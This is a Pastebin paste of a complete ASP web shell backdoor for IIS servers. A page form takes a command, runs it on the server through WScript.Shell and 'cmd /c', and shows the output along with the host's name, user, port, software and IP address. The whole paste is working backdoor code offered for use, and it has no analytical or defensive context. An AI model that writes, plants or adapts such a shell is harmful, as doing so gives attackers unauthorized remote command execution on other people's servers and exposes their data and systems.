daily pastebin goal
25%
SHARE
TWEET

IIS8 Server ASP Shell Backdoor

ZaenalArifin Aug 12th, 2018 (edited) 176 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <%
  2. Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  3. Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  4. Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  5. Function getCommandOutput(theCommand)
  6.     Dim objShell, objCmdExec
  7.     Set objShell = CreateObject("WScript.Shell")
  8.     Set objCmdExec = objshell.exec(thecommand)
  9.     getCommandOutput = objCmdExec.StdOut.ReadAll
  10. end Function
  11. %>
  12. <HTML>
  13. <title>IIS8 ASP Backdoor</title>
  14. <BODY>
  15. <p>
  16. <b>JavaHaxor - IIS8 Server ASP Shell Backdoor</b>
  17. </p>
  18. <FORM action="" method="GET">
  19. <input type="text" name="cmd" size=45 value="<%= szCMD %>">
  20. <input type="submit" value="Run">
  21. </FORM>
  22. <PRE>
  23. <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
  24. <%Response.Write(Request.ServerVariables("server_name"))%>
  25. <p>
  26. <b>SERVER PORT :</b>
  27. <%Response.Write(Request.ServerVariables("server_port"))%>
  28. <b>SERVER SOFTWARE :</b>
  29. <%Response.Write(Request.ServerVariables("server_software"))%>
  30. <b>SERVER IP :</b>
  31. <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
  32. <% szCMD = request("cmd")
  33. thisDir = getCommandOutput("cmd /c" & szCMD)
  34. Response.Write(thisDir)%>
  35. </p>
  36. <br>
  37. <b>Powered by Maceo 25/06/2003<br>
  38. Modified by Zaenal Arifin 13/05/2018</b>
  39. </BODY>
  40. </HTML>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top